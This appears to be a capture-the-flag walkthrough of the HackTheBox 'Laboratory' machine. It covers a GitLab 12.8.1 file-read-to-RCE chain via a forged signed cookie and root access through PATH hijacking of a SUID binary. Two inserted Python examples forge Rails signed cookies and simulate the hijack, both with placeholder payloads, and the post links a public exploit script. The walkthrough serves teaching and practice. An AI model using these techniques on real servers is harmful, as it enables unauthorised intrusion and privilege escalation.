2021-04-16

HackTheBox Laboratory Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • Nmap
  • GitLab 12.8.1 arbitrary file read to RCE
  • gitlab-rails console
  • ltrace
  • PATH hijacking of an unqualified chmod call

0x03 Pentesting

Gaining Foothold

Nmap scan

# Nmap 7.91 scan initiated Tue Jan 26 10:50:56 2021 as: nmap -sV -sC -T4 -Pn -oN nmap.txt 10.10.10.216
Nmap scan report for 10.10.10.216
Host is up (0.23s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
|   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 26 10:54:09 2021 -- 1 IP address (1 host up) scanned in 193.24 seconds

Port 80:

Find a vulnerability in this website? You’re lying! We code 100% secure, and I’m sure you can’t hack us. If you do, definitely don’t let us know.

The site has already told us it is 100% secure, but there is still port 443, and its certificate leaks a second hostname in the Subject Alternative Name:

443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1

Add git.laboratory.htb to /etc/hosts; visiting it reveals a GitLab instance:

Register an account with an e-mail address in the @laboratory.htb domain and log in; the instance reports version 12.8.1.

Metasploit has a module for the GitLab 12.8.1 file read to RCE chain (exploit/multi/http/gitlab_file_read_rce). The bug is an arbitrary file read (CVE-2020-10977): a path-traversal upload reference in an issue description is copied out when the issue is moved to another project. Reading /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml leaks secret_key_base, which lets the attacker forge a validly signed experimentation_subject_id cookie carrying a Ruby deserialization payload, giving code execution as the git user:

There is also a standalone exploit script on GitHub: https://github.com/dotPY-hax/gitlab_RCE/blob/main/gitlab_rce.py

Module options:

Reverse shell obtained:
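The part of the chain worth understanding is why a leaked secret_key_base is equivalent to code execution: Rails signs cookies with a key derived from that secret, so once it is known any cookie value can be forged and the server will trust it enough to deserialise it. The following is an added example, not code from the walkthrough or from the dotPY-hax script. It reproduces the ActiveSupport defaults (PBKDF2-HMAC-SHA1 over secret_key_base with salt "signed cookie", 1000 iterations, 64-byte key; cookie value base64(payload) + "--" + hex HMAC-SHA1) so a forged value can be checked against a real signature. The secret and the JSON payload are constructed placeholders; the actual RCE payload is a Marshal-serialised Ruby object graph and is not reproduced here.

```python
"""Forge and verify a Rails signed cookie from a leaked secret_key_base.

Added example mirroring ActiveSupport::KeyGenerator and MessageVerifier
defaults; the names below are this example's, not GitLab's or Rails' API.
"""
import base64
import hashlib
import hmac
from urllib.parse import quote

SIGNED_COOKIE_SALT = b"signed cookie"  # Rails default action_dispatch.signed_cookie_salt
KDF_ITERATIONS = 1000                  # ActiveSupport::KeyGenerator default
KEY_SIZE = 64                          # KeyGenerator#generate_key default length


def derive_signing_key(secret_key_base: str) -> bytes:
    """KeyGenerator.new(secret_key_base, iterations: 1000).generate_key("signed cookie")."""
    return hashlib.pbkdf2_hmac(
        "sha1", secret_key_base.encode(), SIGNED_COOKIE_SALT, KDF_ITERATIONS, KEY_SIZE
    )


def sign_cookie(secret_key_base: str, payload: bytes) -> str:
    """MessageVerifier#generate: '<base64(payload)>--<hex hmac-sha1 over the base64 text>'."""
    encoded = base64.b64encode(payload).decode("ascii")
    digest = hmac.new(
        derive_signing_key(secret_key_base), encoded.encode("ascii"), hashlib.sha1
    ).hexdigest()
    return f"{encoded}--{digest}"


def verify_cookie(secret_key_base: str, cookie_value: str):
    """MessageVerifier#verified: return the raw payload, or None if the signature fails.
    The payload is returned undecoded; a real app would now hand it to its serializer."""
    encoded, sep, digest = cookie_value.rpartition("--")
    if not sep or not encoded or not digest:
        return None
    expected = hmac.new(
        derive_signing_key(secret_key_base), encoded.encode("ascii"), hashlib.sha1
    ).hexdigest()
    if not hmac.compare_digest(expected, digest):
        return None
    try:
        return base64.b64decode(encoded, validate=True)
    except ValueError:
        return None


def cookie_header(name: str, secret_key_base: str, payload: bytes) -> str:
    """Cookie header line as the browser sends it (Rails URL-escapes the value)."""
    return f"Cookie: {name}={quote(sign_cookie(secret_key_base, payload), safe='')}"


if __name__ == "__main__":
    # Constructed sample: secrets.yml holds a 128-hex-character secret_key_base
    leaked_secret = "0123456789abcdef" * 8
    payload = b'{"forged":true}'  # placeholder; real exploit uses a Marshal gadget chain
    print(cookie_header("experimentation_subject_id", leaked_secret, payload))
    print("accepted by server:", verify_cookie(leaked_secret, sign_cookie(leaked_secret, payload)) == payload)
```

Two caveats when applying this to a real target: the signature only protects integrity, so the moment the key is known the verifier is no defence against whatever the application does with the value afterwards (in GitLab's case, Marshal-loading it); and newer Rails versions can wrap the payload in a `_rails` metadata envelope (purpose and expiry), in which case the plain form above must be adjusted.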

Privilege Escalation

Get User Access

The current user is git and the working directory is under gitlab-rails; /etc/passwd lists no usable users, so this looks like a Docker container.

The public Docker escape payloads did not get me out of the container. A walkthrough showed the intended route: the container is the GitLab instance itself, so gitlab-rails console has full access to its database, and it can be used to reset the password of the CEO user (dexter).

https://www.cnblogs.com/youzhibing/p/12572598.html

After logging in as that user, an SSH private key turned up in dexter's docker-secure repository:

Download it locally and log in over SSH as dexter:

Get Root Access

Had no idea here, so on to a walkthrough...

/usr/local/bin/docker-security is a SUID executable. Use ltrace to trace the library calls the process makes:

It makes two chmod calls.

It calls chmod without specifying the full path /usr/bin/chmod.

So this is exploitable by PATH hijacking.

If you don't know about PATH hijacking, read this article:

Linux Privilege Escalation Using PATH Variable

Because the binary does not use the full path /usr/bin/chmod, the lookup goes through PATH; prepending a directory we control, containing our own chmod, makes the SUID process run our file as root:

My hands were too slow here: the box refreshes on a timer, so try to finish within 10 seconds:
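To make the mechanism above concrete, here is an added example (not the docker-security binary from the box, and not from the linked article) that simulates the vulnerable behaviour in Python: a helper that runs `chmod 700 <file>` the way `system()` would, resolving the executable through the caller's PATH, next to a hardened helper that resolves chmod only from a fixed trusted path. A fake chmod placed in a directory prepended to PATH only writes a marker file so the hijack is observable; the marker file and the `HIJACK_MARKER` variable are this demo's own constructs.

```python
"""Why an unqualified chmod call in a SUID helper is a PATH hijack, and the fix.

Added example. vulnerable_helper stands in for a binary calling
system("chmod 700 <file>"); hardened_helper shows the corrected call.
"""
import os
import shutil
import stat
import subprocess
import tempfile

# Constructed hijack script: a real payload would spawn or plant a root shell;
# this one only records that it ran. HIJACK_MARKER is a hypothetical demo variable.
FAKE_CHMOD = """#!/bin/sh
echo "hijacked: chmod $*" > "$HIJACK_MARKER"
"""

TRUSTED_PATH = "/usr/bin:/bin"


def vulnerable_helper(target: str, env: dict) -> subprocess.CompletedProcess:
    """Mirrors system("chmod 700 target"): the executable is looked up through the
    PATH in the inherited environment, so whoever controls PATH controls what runs."""
    return subprocess.run(["chmod", "700", target], env=env, capture_output=True, text=True)


def hardened_helper(target: str, env: dict) -> subprocess.CompletedProcess:
    """Fix: ignore the inherited PATH, resolve chmod from a fixed trusted path and
    invoke it by absolute path. (Dropping privileges before exec is the other half.)"""
    real_chmod = shutil.which("chmod", path=TRUSTED_PATH)
    if real_chmod is None:
        raise FileNotFoundError("chmod not found in " + TRUSTED_PATH)
    safe_env = dict(env, PATH=TRUSTED_PATH)
    return subprocess.run([real_chmod, "700", target], env=safe_env, capture_output=True, text=True)


def run_demo() -> dict:
    """Run both helpers under a poisoned PATH and report whether the hijack fired."""
    work = tempfile.mkdtemp(prefix="path-hijack-")
    try:
        # Attacker-writable directory holding the fake chmod (the /tmp/chmod of the box)
        hijack_dir = os.path.join(work, "bin")
        os.mkdir(hijack_dir)
        fake = os.path.join(hijack_dir, "chmod")
        with open(fake, "w") as fh:
            fh.write(FAKE_CHMOD)
        os.chmod(fake, 0o755)

        target = os.path.join(work, "target")
        open(target, "w").close()
        os.chmod(target, 0o644)
        marker = os.path.join(work, "marker")

        # Equivalent of: export PATH=/tmp/bin:$PATH before running the SUID binary
        env = dict(
            os.environ,
            PATH=hijack_dir + os.pathsep + os.environ.get("PATH", TRUSTED_PATH),
            HIJACK_MARKER=marker,
        )

        vulnerable_helper(target, env)
        vuln_hijacked = os.path.exists(marker)           # fake chmod ran
        mode_after_vuln = stat.S_IMODE(os.stat(target).st_mode)  # real chmod never did
        if vuln_hijacked:
            os.remove(marker)

        hardened_helper(target, env)
        hard_hijacked = os.path.exists(marker)
        mode_after_hard = stat.S_IMODE(os.stat(target).st_mode)

        return {
            "vulnerable_hijacked": vuln_hijacked,
            "mode_after_vulnerable": mode_after_vuln,
            "hardened_hijacked": hard_hijacked,
            "mode_after_hardened": mode_after_hard,
        }
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    result = run_demo()
    print("vulnerable helper hijacked:", result["vulnerable_hijacked"],
          "target mode:", oct(result["mode_after_vulnerable"]))
    print("hardened helper hijacked:", result["hardened_hijacked"],
          "target mode:", oct(result["mode_after_hardened"]))
```

On the real box the fake chmod has to do its work in one shot (the author's 10-second window), which is why payloads for this class of bug typically copy a shell and set the SUID bit in the same script rather than doing anything interactive. When auditing a SUID binary, the check is the same one ltrace gave here: any `system()`, `popen()` or `exec*p()` call whose program name has no leading slash is a candidate.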

Copyright © ca01h 2019-2021